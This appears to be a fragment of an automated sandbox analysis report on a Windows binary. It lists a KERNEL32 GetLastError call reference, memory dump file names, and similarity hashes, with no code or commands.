                                                                                                                                                                        • GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,004031BD,00000100), ref: 00401295
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$Last$Statusmemcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1706616652-0
                                                                                                                                                                        • Opcode ID: f52de296993238569345912b85dd29c3a6ffa61b8c8323f45adde6a9320c95d8
                                                                                                                                                                        • Instruction ID: 44a939ea81b67d67490989cc1a91529b0d2f81242c3b803bceb4247962c2a2bf
                                                                                                                                                                        • Opcode Fuzzy Hash: f52de296993238569345912b85dd29c3a6ffa61b8c8323f45adde6a9320c95d8
                                                                                                                                                                        • Instruction Fuzzy Hash: C04183B1504301AFD720DF69DD41FABBBE9BB88314F00493EF599E62A0E734D9148B66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%